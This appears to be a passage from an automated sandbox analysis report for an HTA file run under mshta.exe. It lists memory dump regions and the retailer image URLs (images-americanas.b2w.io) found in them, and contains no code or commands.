00000001.00000003.12475198378.000000000717E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.00000000071B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_NOTEBOOKS-e8a0935828ab.png
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_NOTEBOOKS-e8a0935828ab.pngI
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12516007368.000000000968A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_NOTEBOOKS-e8a0935828ab.pngg
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510309350.00000000071B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000717E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.00000000071B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_TELEFONIA-53dfc973fda4.png
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12516007368.000000000968A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_TELEFONIA-53dfc973fda4.png0G
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542545061.000000000963F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12512977574.000000000963E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_TELEFONIA-53dfc973fda4.png0x450-316
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509850041.0000000009698000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510847946.00000000096C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_TELEFONIA-53dfc973fda4.pngb
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12516007368.000000000968A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_TELEFONIA-53dfc973fda4.pngg
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_TELEFONIA-53dfc973fda4.pngy
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000960B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000960A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_TV-dc4baf9a9983.png
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000960B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000960A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574416086.000000000960B000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_UD-fe20595d366f.png
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506503755.000000000A99B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511332893.000000000A99C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12554675837.000000000A99E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000960B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396363836.0000000006A0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/27/432x540-416b11512524.png
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558057036.000000000A990000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542732517.000000000A990000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12569631340.0000000002E4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511657871.000000000A990000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396363836.0000000006A0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/11/09/lojas_oficiais-432x540px-13e329cb6b3b.png
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509182023.00000000096FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/11/09/lojas_oficiais-432x540px-13e329cb6b3b.png_
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509182023.00000000096FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/11/09/lojas_oficiais-432x540px-13e329cb6b3b.pngk
Source: mshta.exe, 00000001.00000002.12573257257.00000000071EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.00000000071ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492287014.00000000071D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000717E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12567402670.000000000C140000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580125535.000000000C141000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/250x260-atalho-desk-app-baixe-o-app1-fb5282b
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510309350.00000000071B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000717E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.00000000071B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-automotivo-9682e64705e8.png
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541646516.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-automotivo-9682e64705e8.png.png
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-automotivo-9682e64705e8.pnge=
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12516007368.000000000968A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-automotivo-9682e64705e8.pnguF
Source: mshta.exe, 00000001.00000003.12554972564.0000000009724000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508002013.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.000000000970F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542078121.0000000009722000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510409430.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-automotivo-9682e64705e8.pngw
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000717E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.00000000071B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12516007368.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506386421.00000000071B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-bebidas-638b2185dbc9.png
